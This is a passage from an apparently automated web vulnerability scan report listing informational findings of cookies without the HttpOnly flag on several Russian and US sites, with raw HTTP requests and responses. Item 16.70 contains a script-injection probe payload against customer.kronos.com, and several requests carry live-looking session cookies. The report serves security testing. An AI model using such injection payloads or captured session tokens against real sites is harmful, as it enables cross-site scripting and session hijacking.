16.54. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0


16.55. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/125/&rnd=538045407

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/125/&rnd=538045407 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835aac8a9; expires=Thu, 19-Apr-2012 14:21:14 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3634

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.56. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/24/&rnd=252896795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/24/&rnd=252896795 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835764628; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3746

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.57. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/26/&rnd=556115021

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/26/&rnd=556115021 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576afa9; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3630

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.58. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/28/&rnd=128924368

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/28/&rnd=128924368 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b45ff; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.59. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/29/&rnd=443104168

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/29/&rnd=443104168 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b76a4; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.60. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/37/&rnd=179025170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/37/&rnd=179025170 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576b38c; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.61. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/44/&rnd=3108367

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/44/&rnd=3108367 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583577059f; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.62. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/138/29/&rnd=808462191

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/138/29/&rnd=808462191 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357ab1f6; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.63. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/236/49/&rnd=44849087

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/236/49/&rnd=44849087 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357e2452; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3518

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.64. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/30/15/&rnd=555318316

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/30/15/&rnd=555318316 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b862a; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 10059

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...

16.65. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/31/16/&rnd=189356183

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/31/16/&rnd=189356183 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835767516; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);

16.66. https://checkout.netsuite.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8


16.67. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...

16.68. http://core2.node12.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core2.node12.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...

16.69. http://count.rbc.ru/p712.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://count.rbc.ru
Path:   /p712.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p712.gif?r=&width=1920&height=1200&hash=&rn=0.2250832160934806 HTTP/1.1
Host: count.rbc.ru
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:50 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Expires: Mon, 25 Apr 2011 14:26:49 GMT
Cache-Control: no-cache
Set-Cookie: UID=wrokyk21hKoDJPTuDHE4Ag==; expires=Tue, 24-Apr-12 14:26:50 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="NON CURa ADMa DEVa OUR IND UNI COM NAV LOC"

GIF89a.............!.......,...........L..;

16.70. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

16.71. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

16.72. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

